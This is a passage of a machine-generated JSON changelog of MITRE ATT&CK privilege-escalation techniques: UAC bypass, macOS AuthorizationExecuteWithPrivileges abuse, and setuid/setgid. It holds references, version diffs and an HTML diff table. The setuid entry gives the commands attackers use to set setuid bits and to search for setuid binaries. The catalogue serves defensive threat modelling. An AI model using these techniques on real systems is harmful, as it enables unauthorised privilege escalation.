                            "url": "https://msdn.microsoft.com/en-us/library/ms679687.aspx"
                        },
                        {
                            "source_name": "enigma0x3 Fileless UAC Bypass",
                            "description": "Nelson, M. (2016, August 15). \"Fileless\" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.",
                            "url": "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/"
                        },
                        {
                            "source_name": "TechNet Inside UAC",
                            "description": "Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.",
                            "url": "https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx"
                        },
                        {
                            "source_name": "Fortinet Fareit",
                            "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.",
                            "url": "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware"
                        },
                        {
                            "source_name": "Github UACMe",
                            "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.",
                            "url": "https://github.com/hfiref0x/UACME"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Stefan Kanthak",
                        "Casey Smith"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:51:31.419000+00:00\", \"old_value\": \"2025-10-24 17:48:25.823000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.2\"}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][1]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}, \"root['external_references'][6]\": {\"source_name\": \"enigma0x3 sdclt app paths\", \"description\": \"Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.\", \"url\": \"https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/\"}, \"root['external_references'][7]\": {\"source_name\": \"enigma0x3 sdclt bypass\", \"description\": \"Nelson, M. (2017, March 17). \\\"Fileless\\\" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017.\", \"url\": \"https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\"}}}",
                    "previous_version": "2.2",
                    "version_change": "2.2 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1047: Audit",
                            "M1051: Update Software",
                            "M1052: User Account Control"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0388: Detection Strategy for T1548.002 \u2013 Bypass User Account Control (UAC)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-30 14:40:20.187000+00:00",
                    "modified": "2026-04-15 19:51:53.527000+00:00",
                    "name": "Elevated Execution with Prompt",
                    "description": "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. \n\nAlthough this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse <code>AuthorizationExecuteWithPrivileges</code> to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1548/004",
                            "external_id": "T1548.004"
                        },
                        {
                            "source_name": "AppleDocs AuthorizationExecuteWithPrivileges",
                            "description": "Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. Retrieved August 8, 2019.",
                            "url": "https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg"
                        },
                        {
                            "source_name": "Carbon Black Shlayer Feb 2019",
                            "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.",
                            "url": "https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html"
                        },
                        {
                            "source_name": "Death by 1000 installers; it's all broken!",
                            "description": "Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019.",
                            "url": "https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8"
                        },
                        {
                            "source_name": "OSX Coldroot RAT",
                            "description": "Patrick Wardle. (2018, February 17). Tearing Apart the Undetected (OSX)Coldroot RAT. Retrieved August 8, 2019.",
                            "url": "https://objective-see.com/blog/blog_0x2A.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jimmy Astle, @AstleJimmy, Carbon Black",
                        "Erika Noerenberg, @gutterchurl, Carbon Black"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "macOS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:51:53.527000+00:00\", \"old_value\": \"2025-10-24 17:49:16.860000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][1]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0395: macOS AuthorizationExecuteWithPrivileges Elevation Prompt Detection"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-30 14:11:41.212000+00:00",
                    "modified": "2026-04-15 19:52:13.675000+00:00",
                    "name": "Setuid and Setgid",
                    "description": "An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user\u2019s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user\u2019s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.\n\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac Permissions](https://attack.mitre.org/techniques/T1222/002)). The <code>chmod</code> command can set these bits with bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>. This will enable the setuid bit. To enable the setgid bit, <code>chmod 2775</code> and <code>chmod g+s</code> can be used.\n\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a \"shell escape\" or other actions to bypass an execution environment with restricted permissions.\n\nAlternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via <code>ls -l</code>. The <code>find</code> command can also be used to search for such files. For example, <code>find / -perm +4000 2>/dev/null</code> can be used to find files with setuid set and <code>find / -perm +2000 2>/dev/null</code> may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1548/001",
                            "external_id": "T1548.001"
                        },
                        {
                            "source_name": "GTFOBins Suid",
                            "description": "Emilio Pinna, Andrea Cardaci. (n.d.). GTFOBins. Retrieved January 28, 2022.",
                            "url": "https://gtfobins.github.io/#+suid"
                        },
                        {
                            "source_name": "OSX Keydnap malware",
                            "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.",
                            "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"
                        },
                        {
                            "source_name": "setuid man page",
                            "description": "Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018.",
                            "url": "http://man7.org/linux/man-pages/man2/setuid.2.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:52:13.675000+00:00\", \"old_value\": \"2025-10-24 17:48:53.456000+00:00\"}, \"root['description']\": {\"new_value\": \"An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user\\u2019s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user\\u2019s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.\\n\\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac Permissions](https://attack.mitre.org/techniques/T1222/002)). The <code>chmod</code> command can set these bits with bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>. This will enable the setuid bit. To enable the setgid bit, <code>chmod 2775</code> and <code>chmod g+s</code> can be used.\\n\\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a \\\"shell escape\\\" or other actions to bypass an execution environment with restricted permissions.\\n\\nAlternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an \\\"s\\\" instead of an \\\"x\\\" when viewing a file's attributes via <code>ls -l</code>. The <code>find</code> command can also be used to search for such files. For example, <code>find / -perm +4000 2>/dev/null</code> can be used to find files with setuid set and <code>find / -perm +2000 2>/dev/null</code> may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)\", \"old_value\": \"An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user\\u2019s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user\\u2019s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.\\n\\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The <code>chmod</code> command can set these bits with bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>. This will enable the setuid bit. To enable the setgid bit, <code>chmod 2775</code> and <code>chmod g+s</code> can be used.\\n\\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a \\\"shell escape\\\" or other actions to bypass an execution environment with restricted permissions.\\n\\nAlternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an \\\"s\\\" instead of an \\\"x\\\" when viewing a file's attributes via <code>ls -l</code>. The <code>find</code> command can also be used to search for such files. For example, <code>find / -perm +4000 2>/dev/null</code> can be used to find files with setuid set and <code>find / -perm +2000 2>/dev/null</code> may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)\", \"diff\": \"--- \\n+++ \\n@@ -1,6 +1,6 @@\\n An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user\\u2019s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user\\u2019s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.\\n \\n-Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The <code>chmod</code> command can set these bits with bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>. This will enable the setuid bit. To enable the setgid bit, <code>chmod 2775</code> and <code>chmod g+s</code> can be used.\\n+Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac Permissions](https://attack.mitre.org/techniques/T1222/002)). The <code>chmod</code> command can set these bits with bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>. This will enable the setuid bit. To enable the setgid bit, <code>chmod 2775</code> and <code>chmod g+s</code> can be used.\\n \\n Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a \\\"shell escape\\\" or other actions to bypass an execution environment with restricted permissions.\\n \"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][1]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to21__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to21__0\"><a href=\"#difflib_chg_to21__top\">t</a></td><td class=\"diff_header\" id=\"from21_1\">1</td><td nowrap=\"nowrap\">An&nbsp;adversary&nbsp;may&nbsp;abuse&nbsp;configurations&nbsp;where&nbsp;an&nbsp;application&nbsp;h</td><td class=\"diff_next\"><a href=\"#difflib_chg_to21__top\">t</a></td><td class=\"diff_header\" id=\"to21_1\">1</td><td nowrap=\"nowrap\">An&nbsp;adversary&nbsp;may&nbsp;abuse&nbsp;configurations&nbsp;where&nbsp;an&nbsp;application&nbsp;h</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">as&nbsp;the&nbsp;setuid&nbsp;or&nbsp;setgid&nbsp;bits&nbsp;set&nbsp;in&nbsp;order&nbsp;to&nbsp;get&nbsp;code&nbsp;runnin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">as&nbsp;the&nbsp;setuid&nbsp;or&nbsp;setgid&nbsp;bits&nbsp;set&nbsp;in&nbsp;order&nbsp;to&nbsp;get&nbsp;code&nbsp;runnin</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;in&nbsp;a&nbsp;different&nbsp;(and&nbsp;possibly&nbsp;more&nbsp;privileged)&nbsp;user\u2019s&nbsp;conte</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;in&nbsp;a&nbsp;different&nbsp;(and&nbsp;possibly&nbsp;more&nbsp;privileged)&nbsp;user\u2019s&nbsp;conte</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">xt.&nbsp;On&nbsp;Linux&nbsp;or&nbsp;macOS,&nbsp;when&nbsp;the&nbsp;setuid&nbsp;or&nbsp;setgid&nbsp;bits&nbsp;are&nbsp;se</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">xt.&nbsp;On&nbsp;Linux&nbsp;or&nbsp;macOS,&nbsp;when&nbsp;the&nbsp;setuid&nbsp;or&nbsp;setgid&nbsp;bits&nbsp;are&nbsp;se</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;for&nbsp;an&nbsp;application&nbsp;binary,&nbsp;the&nbsp;application&nbsp;will&nbsp;run&nbsp;with&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;for&nbsp;an&nbsp;application&nbsp;binary,&nbsp;the&nbsp;application&nbsp;will&nbsp;run&nbsp;with&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;privileges&nbsp;of&nbsp;the&nbsp;owning&nbsp;user&nbsp;or&nbsp;group&nbsp;respectively.(Cita</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;privileges&nbsp;of&nbsp;the&nbsp;owning&nbsp;user&nbsp;or&nbsp;group&nbsp;respectively.(Cita</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion:&nbsp;setuid&nbsp;man&nbsp;page)&nbsp;Normally&nbsp;an&nbsp;application&nbsp;is&nbsp;run&nbsp;in&nbsp;the</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion:&nbsp;setuid&nbsp;man&nbsp;page)&nbsp;Normally&nbsp;an&nbsp;application&nbsp;is&nbsp;run&nbsp;in&nbsp;the</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;current&nbsp;user\u2019s&nbsp;context,&nbsp;regardless&nbsp;of&nbsp;which&nbsp;user&nbsp;or&nbsp;group&nbsp;o</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;current&nbsp;user\u2019s&nbsp;context,&nbsp;regardless&nbsp;of&nbsp;which&nbsp;user&nbsp;or&nbsp;group&nbsp;o</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">wns&nbsp;the&nbsp;application.&nbsp;However,&nbsp;there&nbsp;are&nbsp;instances&nbsp;where&nbsp;prog</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">wns&nbsp;the&nbsp;application.&nbsp;However,&nbsp;there&nbsp;are&nbsp;instances&nbsp;where&nbsp;prog</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rams&nbsp;need&nbsp;to&nbsp;be&nbsp;executed&nbsp;in&nbsp;an&nbsp;elevated&nbsp;context&nbsp;to&nbsp;function&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rams&nbsp;need&nbsp;to&nbsp;be&nbsp;executed&nbsp;in&nbsp;an&nbsp;elevated&nbsp;context&nbsp;to&nbsp;function&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">properly,&nbsp;but&nbsp;the&nbsp;user&nbsp;running&nbsp;them&nbsp;may&nbsp;not&nbsp;have&nbsp;the&nbsp;specifi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">properly,&nbsp;but&nbsp;the&nbsp;user&nbsp;running&nbsp;them&nbsp;may&nbsp;not&nbsp;have&nbsp;the&nbsp;specifi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">c&nbsp;required&nbsp;privileges.&nbsp;&nbsp;Instead&nbsp;of&nbsp;creating&nbsp;an&nbsp;entry&nbsp;in&nbsp;the&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">c&nbsp;required&nbsp;privileges.&nbsp;&nbsp;Instead&nbsp;of&nbsp;creating&nbsp;an&nbsp;entry&nbsp;in&nbsp;the&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sudoers&nbsp;file,&nbsp;which&nbsp;must&nbsp;be&nbsp;done&nbsp;by&nbsp;root,&nbsp;any&nbsp;user&nbsp;can&nbsp;speci</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sudoers&nbsp;file,&nbsp;which&nbsp;must&nbsp;be&nbsp;done&nbsp;by&nbsp;root,&nbsp;any&nbsp;user&nbsp;can&nbsp;speci</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">fy&nbsp;the&nbsp;setuid&nbsp;or&nbsp;setgid&nbsp;flag&nbsp;to&nbsp;be&nbsp;set&nbsp;for&nbsp;their&nbsp;own&nbsp;applica</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">fy&nbsp;the&nbsp;setuid&nbsp;or&nbsp;setgid&nbsp;flag&nbsp;to&nbsp;be&nbsp;set&nbsp;for&nbsp;their&nbsp;own&nbsp;applica</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tions&nbsp;(i.e.&nbsp;[Linux&nbsp;and&nbsp;Mac&nbsp;<span class=\"diff_sub\">File&nbsp;and&nbsp;Directory&nbsp;</span>Permissions<span class=\"diff_sub\">&nbsp;Mo</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tions&nbsp;(i.e.&nbsp;[Linux&nbsp;and&nbsp;Mac&nbsp;Permissions](https://attack.mitre</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">dification</span>](https://attack.mitre.org/techniques/T1222/002)).</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.org/techniques/T1222/002)).&nbsp;The&nbsp;&lt;code&gt;chmod&lt;/code&gt;&nbsp;command&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;The&nbsp;&lt;code&gt;chmod&lt;/code&gt;&nbsp;command&nbsp;can&nbsp;set&nbsp;these&nbsp;bits&nbsp;with&nbsp;bitm</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">can&nbsp;set&nbsp;these&nbsp;bits&nbsp;with&nbsp;bitmasking,&nbsp;&lt;code&gt;chmod&nbsp;4777&nbsp;[file]&lt;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">asking,&nbsp;&lt;code&gt;chmod&nbsp;4777&nbsp;[file]&lt;/code&gt;&nbsp;or&nbsp;via&nbsp;shorthand&nbsp;nami</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/code&gt;&nbsp;or&nbsp;via&nbsp;shorthand&nbsp;naming,&nbsp;&lt;code&gt;chmod&nbsp;u+s&nbsp;[file]&lt;/code</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ng,&nbsp;&lt;code&gt;chmod&nbsp;u+s&nbsp;[file]&lt;/code&gt;.&nbsp;This&nbsp;will&nbsp;enable&nbsp;the&nbsp;setu</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&gt;.&nbsp;This&nbsp;will&nbsp;enable&nbsp;the&nbsp;setuid&nbsp;bit.&nbsp;To&nbsp;enable&nbsp;the&nbsp;setgid&nbsp;bit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">id&nbsp;bit.&nbsp;To&nbsp;enable&nbsp;the&nbsp;setgid&nbsp;bit,&nbsp;&lt;code&gt;chmod&nbsp;2775&lt;/code&gt;&nbsp;an</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;&lt;code&gt;chmod&nbsp;2775&lt;/code&gt;&nbsp;and&nbsp;&lt;code&gt;chmod&nbsp;g+s&lt;/code&gt;&nbsp;can&nbsp;be&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;&lt;code&gt;chmod&nbsp;g+s&lt;/code&gt;&nbsp;can&nbsp;be&nbsp;used.&nbsp;&nbsp;Adversaries&nbsp;can&nbsp;use&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">used.&nbsp;&nbsp;Adversaries&nbsp;can&nbsp;use&nbsp;this&nbsp;mechanism&nbsp;on&nbsp;their&nbsp;own&nbsp;malwa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">his&nbsp;mechanism&nbsp;on&nbsp;their&nbsp;own&nbsp;malware&nbsp;to&nbsp;make&nbsp;sure&nbsp;they're&nbsp;able</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re&nbsp;to&nbsp;make&nbsp;sure&nbsp;they're&nbsp;able&nbsp;to&nbsp;execute&nbsp;in&nbsp;elevated&nbsp;contexts</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;execute&nbsp;in&nbsp;elevated&nbsp;contexts&nbsp;in&nbsp;the&nbsp;future.(Citation:&nbsp;OS</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;in&nbsp;the&nbsp;future.(Citation:&nbsp;OSX&nbsp;Keydnap&nbsp;malware)&nbsp;This&nbsp;abuse&nbsp;is</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">X&nbsp;Keydnap&nbsp;malware)&nbsp;This&nbsp;abuse&nbsp;is&nbsp;often&nbsp;part&nbsp;of&nbsp;a&nbsp;\"shell&nbsp;esca</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;often&nbsp;part&nbsp;of&nbsp;a&nbsp;\"shell&nbsp;escape\"&nbsp;or&nbsp;other&nbsp;actions&nbsp;to&nbsp;bypass&nbsp;a</td></tr>\n            